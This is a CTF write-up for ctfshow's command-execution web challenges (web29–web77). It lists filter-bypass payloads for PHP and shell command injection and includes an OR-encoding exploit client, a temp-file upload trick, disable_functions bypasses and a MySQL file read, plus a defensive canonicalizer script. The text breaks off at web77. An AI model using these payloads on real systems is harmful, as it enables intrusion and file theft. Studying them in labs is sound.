# ctfshow command execution

## web29
`flag` is filtered.
payload (a few approaches, in no particular order):
```
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
```
I don't know the rest.
## web30
`flag|system|php` are filtered.
Use `echo` with backticks to run the command.
payload:
```
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
```
## web31
Filtered: `flag|system|php|cat|sort|shell|\.| |`
No matter, we have plenty of tricks.
payload:
```
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
```
## web32
`include` does not need parentheses, and the semicolon can be replaced by `?>`.
payload:
```
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
```
## web33-36
payload:
```
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
```
## web37
```php
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
```
payload:
```
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>
```
## web38
`flag` is filtered.
payload:
```
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
```
## web39
payload:
```
/?c=data://text/palin,<?php%20system("nl%20f*");?>
```
## web40
In theory this is XOR.
But I'm lazy.
Pasting the exp:
```python
import re

# Script 1: build rce_or.txt, a table that maps every printable character to a
# pair of unfiltered bytes whose bitwise OR produces it.
content = ''
# the challenge's PHP regex, with the PHP delimiters stripped for Python's re
preg = r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-'
for i in range(256):
    for j in range(256):
        if not (re.match(preg, chr(i), re.I) or re.match(preg, chr(j), re.I)):
            k = i | j
            if 32 <= k <= 126:
                a = '%' + hex(i)[2:].zfill(2)
                b = '%' + hex(j)[2:].zfill(2)
                content += chr(k) + ' ' + a + ' ' + b + '\n'
with open('rce_or.txt', 'w') as f:
    f.write(content)
```
```python
# -*- coding: utf-8 -*-
# Script 2: interactive client that encodes a function name and its argument
# with the rce_or.txt table and sends them as the c parameter.
import os
import sys
import urllib.parse
import requests

os.system("php rce_or.php")  # if php is not on PATH, run this step by hand

if len(sys.argv) != 2:
    print("=" * 50)
    print('USAGE: python exp.py <url>')
    print("eg: python exp.py http://ctf.show/")
    print("=" * 50)
    sys.exit(0)
url = sys.argv[1]

def action(arg):
    # look up each character in rce_or.txt and collect the two OR operands
    s1 = ""
    s2 = ""
    for i in arg:
        with open("rce_or.txt", "r") as f:
            for t in f:
                if t[0] == i:
                    s1 += t[2:5]
                    s2 += t[6:9]
                    break
    output = "(\"" + s1 + "\"|\"" + s2 + "\")"
    return output

while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
    data = {'c': urllib.parse.unquote(param)}
    r = requests.post(url, data=data)
    print("\n[*] result:\n" + r.text)
```
The filter regex in `preg` bans `^`, which is why the script pairs bytes with bitwise OR (`|`) rather than XOR.
## web41
payload:
```
/?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
```
## web42
`>/dev/null 2>&1` sends every output stream (stdout and stderr) to the null device, where it is discarded.
Cut the command off before that redirection with `%0a`, `%26` or `||`.
payload:
```
/?c=nl%20*%0a
```
= = I won't list many tricks here.
After the cut, improvise according to the filter.
## web43
`;` and `cat` are filtered.
payload:
```
/?c=nl%20*%0a
```
## web44
`flag` is filtered as well.
Wildcards take care of it.
payload:
```
/?c=nl%20*%0a
```
## web45
Spaces are filtered.
payload:
```
/?c=nl$IFS*%0a
```
## web46-49
Filtered: `\;|cat|flag| |[0-9]|\\$|\*/`
payload:
```
/?c=nl%09fla\g.php||
/?c=nl%09fla\g.php%0a
/?c=nl%09fla''g.php%0a
/?c=nl%09fla""g.php%0a
/?c=vi%09fla\g.php%0a
/?c=tac%09fla\g.php%0a
/?c=uniq%09fla\g.php%0a
/?c=nl<fla''g.php||
/?c=nl%09fla\g.php%26
```
## web50-51
payload:
```
/?c=nl<fla%27%27g.php||
```
## web52
payload:
```
/?c=nl${IFS}/fl""ag%0a
```
## web53
payload:
```
/?c=nl${IFS}fla%''g.p''hp
/?c=ca''t${IFS}fl??????
/?c=ca''t${IFS}fl''ag.p''hp
```
There should be other approaches too.
## web54
payload:
```
/?c=mv${IFS}fla?.php${IFS}t.tx''t
```
Just rename it.
```
/?c=/bin/?at${IFS}f???????
```
## web55
= = Only digits are allowed.
Sorry, the fancy tricks start here.
payload:
```
/?c=/???/????64+????.???
```
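Every payload from web29 through web55 gets past a check that runs `preg_match("/flag/i")` on the raw parameter. As an added example (not from the original writeup), the Python below canonicalizes a command string the way the shell would see it before applying the same check, so a detection rule or WAF sees the real target; the function names, the `PROTECTED` list and the sample inputs (taken from this page's payloads) are my own choices.

```python
import re
from fnmatch import fnmatchcase
from urllib.parse import unquote

# Constructed samples: obfuscated payloads from this page plus a benign command,
# each paired with whether it really touches the flag file.
SAMPLES = [
    ("nl fl??????", True),
    ("nl fla''g.php", True),
    ("nl fla\\g.php", True),
    ("nl%09fla\\g.php||", True),
    ("nl<fla%27%27g.php||", True),
    ("ca''t${IFS}fl??????", True),
    ("/bin/?at${IFS}f???????", True),
    ("nl%20*%0a", True),
    ("ls -la", False),
]

# Files a rule wants to protect (assumed names, matching this page's challenges).
PROTECTED = ("flag.php", "flag.txt", "flag")

def naive_blacklist_hits(raw):
    """The challenge's own check: preg_match('/flag/i') on the raw parameter."""
    return re.search("flag", raw, re.I) is not None

def canonicalize(raw):
    """Undo the cheap shell obfuscations seen on this page and split into words."""
    s = unquote(raw)                              # %09, %0a, %27 ...
    s = re.sub(r"\$\{?IFS\}?", " ", s)            # $IFS / ${IFS} are whitespace
    s = s.replace("''", "").replace('""', "")     # empty quotes vanish in the shell
    s = re.sub(r"\\(.)", r"\1", s)                # fla\g -> flag
    s = re.sub(r"[;&|<>\n]+", " ", s)             # separators and redirections
    return s.split()

def references_protected(raw):
    """True if any word, read as a shell glob, could expand to a protected file."""
    for word in canonicalize(raw):
        name = word.rsplit("/", 1)[-1]            # compare the basename only
        if any(fnmatchcase(target, name) for target in PROTECTED):
            return True
    return False

def report(samples=SAMPLES):
    """Return (raw, naive_hit, canonical_hit) for each sample."""
    return [(raw, naive_blacklist_hits(raw), references_protected(raw))
            for raw, _ in samples]
```

Canonicalizing closes the gaps this page exploits, but a blacklist is never complete: the later levels (digit-only globs, uploaded temp files) only stop at an allow-list of permitted input.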
## web56
Request (the `.` command sources the uploaded temp file matched by the glob):
```http
POST /?c=.+/???/????????[@-[] HTTP/1.1
Host: 6595d4e2-edc5-4ff4-a08b-c93d2f563732.challenge.ctf.show:8080
Content-Length: 329
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydZeuVbMPZVcyvpNM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream

#!/bin/sh
cat /var/www/html/flag.php
------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="submit"

111
------WebKitFormBoundarydZeuVbMPZVcyvpNM--
```
## web58
Build the number 36: in shell arithmetic `${_}` is empty and evaluates to 0, `~0` is -1, and 37 copies of `$((~$((${_}))))` written back to back read as `-1-1...-1`, i.e. -37; negating that once more, `~(-37)`, gives 36.
payload:
$((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))))))
## web59
Bypassing disable_functions.
I could only think of one way: `file`, which reads the file into an array that can then be printed.
payload:
```
c=var_dump(file('flag.php'));
c=highlight_file("flag.php");
c=show_source('flag.php');
```
## web60-65
payload:
```
c=highlight_file("flag.php");
c=show_source('flag.php');
```
## web66
payload:
```
c=var_dump(scandir("/"));
```
The scan shows the flag is a .txt file.
Then, damn it:
```
c=highlight_file('/flag.txt');
```
## web67-70
= = Wow, they ban a lot.
payload:
```
c=include('/flag.txt');
c=require('/flag.txt');
c=require_once('/flag.txt');
```
## web71
ob_get_contents returns the contents of the output buffer; ob_end_clean cleans (erases) the output buffer and turns off output buffering.
ob_end_clean discards the contents of the topmost output buffer and turns that buffer off. If you want to process the buffer's contents further, you must call ob_get_contents() before ob_end_clean(), because the buffer contents are discarded when ob_end_clean() is called.
The payload therefore calls exit() right after the include: the script shuts down before ob_end_clean() runs, and PHP flushes the still-open buffer on shutdown, so the included content is sent.
payload:
```
c=include('/flag.txt');;exit();
```
## web72
Just look at y4's blog. = = Not pasting the payload, it's too long.
## web73
```php
c=?><?php
$a = new DirectoryIterator("glob:///*");
foreach ($a as $f) {
    echo($f->__toString() . ' ');
}
exit(0);
?>
```
Take a look at the directory listing, then:
payload:
```
c=include('/flagc.txt');exit();
```
## web74
Same as web73.
## web75-76
List the directory:
```php
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);
```
Read the file with MySQL load_file:
```php
c=try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
    foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
        echo($row[0]) . "|";
    }
    $dbh = null;
} catch (PDOException $e) {
    echo $e->getMessage();
    exit(0);
}
exit(0);
```
## web77
I'm not really sure how this one is meant to be done,
but I reproduced it